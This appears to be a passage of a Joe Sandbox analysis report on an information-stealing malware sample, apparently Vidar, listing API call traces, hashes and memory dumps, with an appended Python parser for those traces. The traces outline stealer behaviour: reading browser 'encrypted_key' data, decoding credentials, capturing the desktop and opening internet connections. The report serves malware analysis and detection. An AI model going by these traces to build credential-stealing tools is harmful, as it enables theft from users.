                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTime
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1139693110-0
                                                                                                                                                                        • Opcode ID: 8c3df6188e3ae79fcf29a52077f0424a8d6b92e48bc369d397defca204e24785
                                                                                                                                                                        • Instruction ID: 180ad22d2539a9ed29709e891525bb3ae69665e8e850a97e437088300547f592
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c3df6188e3ae79fcf29a52077f0424a8d6b92e48bc369d397defca204e24785
                                                                                                                                                                        • Instruction Fuzzy Hash: 05C1D432904119AFDF02BBA4EC868EE7BB9FF28704F114066F601B7062DB716E469F51
APIs
• lstrlenA.KERNEL32(00000000,74DE83C0,00000000,0019C5A0,?), ref: 0019B8BA
• StrCmpCA.SHLWAPI(74DE83C0,001B613C), ref: 0019B8E8
• StrCmpCA.SHLWAPI(74DE83C0,.zip), ref: 0019B8F8
• StrCmpCA.SHLWAPI(74DE83C0,.zoo), ref: 0019B904
• StrCmpCA.SHLWAPI(74DE83C0,.arc), ref: 0019B910
• StrCmpCA.SHLWAPI(74DE83C0,.lzh), ref: 0019B91C
• StrCmpCA.SHLWAPI(74DE83C0,.arj), ref: 0019B928
• StrCmpCA.SHLWAPI(74DE83C0,.gz), ref: 0019B934
• StrCmpCA.SHLWAPI(74DE83C0,.tgz), ref: 0019B940
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrlen
• String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
• API String ID: 1659193697-51310709
• Opcode ID: 0e47a320c9bb73b29fde8727bb9b229812c3ba7e5fe20db1d9f7a6e85077a0af
• Instruction ID: 2b353a67950a330f1b5749c8a14f6c6124e69ec45a1249b69ad17e38b018e681
• Opcode Fuzzy Hash: 0e47a320c9bb73b29fde8727bb9b229812c3ba7e5fe20db1d9f7a6e85077a0af
• Instruction Fuzzy Hash: BF014D20B89366759F722535AFC6DBF1E5D4EABFC17050025FC00E1488DB5C995369B1
APIs
• strtok_s.MSVCRT ref: 0019362A
• StrCmpCA.SHLWAPI(?,true), ref: 001936EC
  • Part of subcall function 0019051E: lstrlenA.KERNEL32(?,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190524
  • Part of subcall function 0019051E: lstrcpyA.KERNEL32(00000000,00000000,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190556
• lstrcpyA.KERNEL32(?,?), ref: 001937AE
• lstrcpyA.KERNEL32(?,00000000), ref: 001937DF
• lstrcpyA.KERNEL32(?,00000000), ref: 0019381B
• lstrcpyA.KERNEL32(?,00000000), ref: 00193857
• lstrcpyA.KERNEL32(?,00000000), ref: 00193893
• lstrcpyA.KERNEL32(?,00000000), ref: 001938CF
• lstrcpyA.KERNEL32(?,00000000), ref: 0019390B
• strtok_s.MSVCRT ref: 001939CF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcpy$strtok_s$lstrlen
• String ID: false$true
• API String ID: 2116072422-2658103896
• Opcode ID: 8b364284531451f0af76ee60d627368f2e476a0d059e8bae760f515317564998
• Instruction ID: fa82cd0710cfc708a1a539ccf7dc6f3af431461d3e6ee1a72fb51058193bf912
• Opcode Fuzzy Hash: 8b364284531451f0af76ee60d627368f2e476a0d059e8bae760f515317564998
• Instruction Fuzzy Hash: D7B12875901229ABCF65EB54DC89AD977B9FF28304F4001E6E45AA7261EB70AFC4CF40
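Added example, not part of the Joe Sandbox report or of the sample: a small Python parser for the "• API.MODULE(args), ref: ADDR" lines printed under each function's APIs header above, including the indented "Part of subcall function" lines. It treats "?" and 8-digit hex values as arguments the sandbox could not resolve (an assumption of this example; a genuine string of exactly eight uppercase hex characters would be misclassified) and collects the literals handed to StrCmp*/lstrcmp*/StrStr* calls, so the archive-extension list compared at 0019B8F8 through 0019B940 and the true token compared at 001936EC fall straight out of the listing. The two embedded traces are copied from the two function entries above; the helper and function names are this example's own.

```python
"""Parse Joe Sandbox 'APIs' trace lines and pull out the constants a function compares against."""
from __future__ import annotations

import re
from dataclasses import dataclass

# One trace line looks like one of these (bullet, optional subcall prefix, API.MODULE, optional args, ref):
#   • StrCmpCA.SHLWAPI(74DE83C0,.zip), ref: 0019B8F8
#   • strtok_s.MSVCRT ref: 0019362A
#     • Part of subcall function 0019051E: lstrlenA.KERNEL32(?,?), ref: 00190524
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"  # argument list is absent for CRT calls such as strtok_s
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
# Assumption: "?" and 8-digit uppercase hex are unresolved pointers/values, not strings.
PLACEHOLDER_RE = re.compile(r"^(?:\?|[0-9A-F]{8})$")
# APIs whose arguments are the strings the sample is matching against.
COMPARE_PREFIXES = ("StrCmp", "lstrcmp", "StrStr")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str
    subcall: str | None = None  # callee address when the line is "Part of subcall function"

    def literals(self) -> list[str]:
        """Arguments the sandbox printed as readable strings rather than pointers or '?'."""
        return [a for a in self.args if not PLACEHOLDER_RE.fullmatch(a)]


def parse_trace(text: str) -> list[ApiCall]:
    """Parse every '• API.MODULE(args), ref: ADDR' line; lines that do not match are skipped."""
    calls: list[ApiCall] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        # The report separates arguments with commas and does not quote strings,
        # so a literal that itself contains a comma cannot be recovered exactly.
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, m.group("ref"), m.group("subcall")))
    return calls


def compared_literals(calls: list[ApiCall]) -> list[str]:
    """Strings handed to string-comparison APIs, in call order (e.g. an extension block list)."""
    out: list[str] = []
    for c in calls:
        if c.api.startswith(COMPARE_PREFIXES):
            out.extend(c.literals())
    return out


def summarize(calls: list[ApiCall]) -> dict:
    """Compact view of a function: imports it uses directly, what it compares, what it calls into."""
    return {
        "imports": sorted({f"{c.api}.{c.module}" for c in calls if c.subcall is None}),
        "compared": compared_literals(calls),
        "subcalls": sorted({c.subcall for c in calls if c.subcall}),
    }


# Traces copied from the two function entries in the report above.
EXT_CHECK_TRACE = """\
• lstrlenA.KERNEL32(00000000,74DE83C0,00000000,0019C5A0,?), ref: 0019B8BA
• StrCmpCA.SHLWAPI(74DE83C0,001B613C), ref: 0019B8E8
• StrCmpCA.SHLWAPI(74DE83C0,.zip), ref: 0019B8F8
• StrCmpCA.SHLWAPI(74DE83C0,.zoo), ref: 0019B904
• StrCmpCA.SHLWAPI(74DE83C0,.arc), ref: 0019B910
• StrCmpCA.SHLWAPI(74DE83C0,.lzh), ref: 0019B91C
• StrCmpCA.SHLWAPI(74DE83C0,.arj), ref: 0019B928
• StrCmpCA.SHLWAPI(74DE83C0,.gz), ref: 0019B934
• StrCmpCA.SHLWAPI(74DE83C0,.tgz), ref: 0019B940
"""

CONFIG_TRACE = """\
• strtok_s.MSVCRT ref: 0019362A
• StrCmpCA.SHLWAPI(?,true), ref: 001936EC
  • Part of subcall function 0019051E: lstrlenA.KERNEL32(?,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190524
  • Part of subcall function 0019051E: lstrcpyA.KERNEL32(00000000,00000000,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190556
• lstrcpyA.KERNEL32(?,?), ref: 001937AE
• strtok_s.MSVCRT ref: 001939CF
"""

if __name__ == "__main__":
    for name, trace in (("extension check", EXT_CHECK_TRACE), ("config parser", CONFIG_TRACE)):
        print(name, summarize(parse_trace(trace)))
```

Feeding the first trace yields the seven archive extensions in the order the sample tests them; the second yields only "true", with the two lstrlenA/lstrcpyA lines attributed to subcall 0019051E rather than to the function's own imports. Pointing the parser at a whole report lets the same compared-literal list be diffed across Vidar samples without re-reading each function block by hand.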
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExitProcessstrtok_s
                                                                                                                                                                        • String ID: block
                                                                                                                                                                        • API String ID: 3407564107-2199623458
                                                                                                                                                                        • Opcode ID: 2936ceae808e30828c9c1a868894474149af25ecca641710117ca0de30ec9587
                                                                                                                                                                        • Instruction ID: deb0ccb2ceb4547041c701e0fcbff1e679b8da44d69bdfc17a955957cc4459d9
                                                                                                                                                                        • Opcode Fuzzy Hash: 2936ceae808e30828c9c1a868894474149af25ecca641710117ca0de30ec9587
                                                                                                                                                                        • Instruction Fuzzy Hash: B0416BB0A40306FBDF416F74EC89EAA7BACFB24B5AB104026F413D6092E734D650AB55
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00195885
                                                                                                                                                                        • _memset.LIBCMT ref: 00195896
                                                                                                                                                                          • Part of subcall function 00191D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 001958C1
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 001958DF
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 001958F3
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00195906
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00191D67: GetFileAttributesA.KERNEL32(?,?,?,0018DA54,?,?,?), ref: 00191D6E
                                                                                                                                                                          • Part of subcall function 0018819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0018CC65,?,?), ref: 001881E5
                                                                                                                                                                          • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                          • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                          • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                          • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                          • Part of subcall function 001921BC: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0019599C,?), ref: 001921C7
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000), ref: 001959AA
                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00195ACE
                                                                                                                                                                          • Part of subcall function 00188048: CryptStringToBinaryA.CRYPT32(00186724,00000000,00000001,00000000,?,00000000,00000000), ref: 00188060
                                                                                                                                                                          • Part of subcall function 00188048: LocalAlloc.KERNEL32(00000040,?,?,?,00186724,?), ref: 0018806E
                                                                                                                                                                          • Part of subcall function 00188048: CryptStringToBinaryA.CRYPT32(00186724,00000000,00000001,00000000,?,00000000,00000000), ref: 00188084
                                                                                                                                                                          • Part of subcall function 00188048: LocalFree.KERNEL32(?,?,?,00186724,?), ref: 00188093
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00195A5A
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B6645), ref: 00195A77
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00195A96
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B6A94), ref: 00195AA7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4109952398-0
                                                                                                                                                                        • Opcode ID: a73e5116ffaf301163343ff59a1515bef51ff6a3a05b0e5c5665d2bf3729e17f
                                                                                                                                                                        • Instruction ID: 280f18b78a883614d2d03ff19e11c6113b757b5af028c487e8b631b692c0e2a4
                                                                                                                                                                        • Opcode Fuzzy Hash: a73e5116ffaf301163343ff59a1515bef51ff6a3a05b0e5c5665d2bf3729e17f
                                                                                                                                                                        • Instruction Fuzzy Hash: 76715EB5C4012C9FDF21EF24DC85BD977BAAB98310F0405E6E508A3250EB329BA58F51
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00191F6B
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00191F79
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00191F86
                                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00191FB3
                                                                                                                                                                        • GetHGlobalFromStream.COMBASE(?,?), ref: 0019201E
                                                                                                                                                                        • GlobalLock.KERNEL32(?), ref: 00192027
                                                                                                                                                                        • GlobalSize.KERNEL32(?), ref: 00192033
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00185482: lstrlenA.KERNEL32(?), ref: 00185519
                                                                                                                                                                          • Part of subcall function 00185482: StrCmpCA.SHLWAPI(?,001B6976,001B695B,001B6957,001B694B), ref: 00185588
                                                                                                                                                                          • Part of subcall function 00185482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 001855AA
                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00192091
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 001920AC
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 001920B5
                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 001920BD
                                                                                                                                                                        • CloseWindow.USER32(00000000), ref: 001920C4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: GlobalObject$Window$DeleteSelectStreamlstrcpy$CloseCreateDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1802806997-0
                                                                                                                                                                        • Opcode ID: d39e8049ba49bd79cb0725f927157ca300bc71758a151bfb6deca8333548c529
                                                                                                                                                                        • Instruction ID: 16b6a9e270406d7eb5391b6d91f2b97583bf0fdc525982f0d52a2164fecd8f53
                                                                                                                                                                        • Opcode Fuzzy Hash: d39e8049ba49bd79cb0725f927157ca300bc71758a151bfb6deca8333548c529
                                                                                                                                                                        • Instruction Fuzzy Hash: C851C176801118AFDF12BFA5ED499AEBF7DFF08311F044426F901E6120DB309A55DBA1
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3833677464-0
                                                                                                                                                                        • Opcode ID: 0bfd5681c6dfdf8b1efa893f65c53523ad19a6f35d026be3c84c101a930647ac
                                                                                                                                                                        • Instruction ID: 6f4ce30bc2d34ef7adbda06b17400535aba745b70af9cd036151d4ac42f0a1f0
                                                                                                                                                                        • Opcode Fuzzy Hash: 0bfd5681c6dfdf8b1efa893f65c53523ad19a6f35d026be3c84c101a930647ac
                                                                                                                                                                        • Instruction Fuzzy Hash: B521083D504600EFDB39BF29E803D5ABBE4EFA3B64B24442DF58596152EF319C009A65
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001815BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 001815C6
                                                                                                                                                                          • Part of subcall function 001815BC: HeapAlloc.KERNEL32(00000000), ref: 001815CD
                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00181606
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0018160C
                                                                                                                                                                        • SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00181614
                                                                                                                                                                        • GetWindowContextHelpId.USER32(00000000), ref: 0018161B
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,00000000), ref: 00181623
                                                                                                                                                                        • RegisterClassW.USER32(00000000), ref: 0018162A
                                                                                                                                                                        • IsWindowVisible.USER32(00000000), ref: 00181631
                                                                                                                                                                        • ConvertDefaultLocale.KERNEL32(00000000), ref: 00181638
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00181644
                                                                                                                                                                        • IsDialogMessageW.USER32(00000000,00000000), ref: 0018164C
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00181656
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018165D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
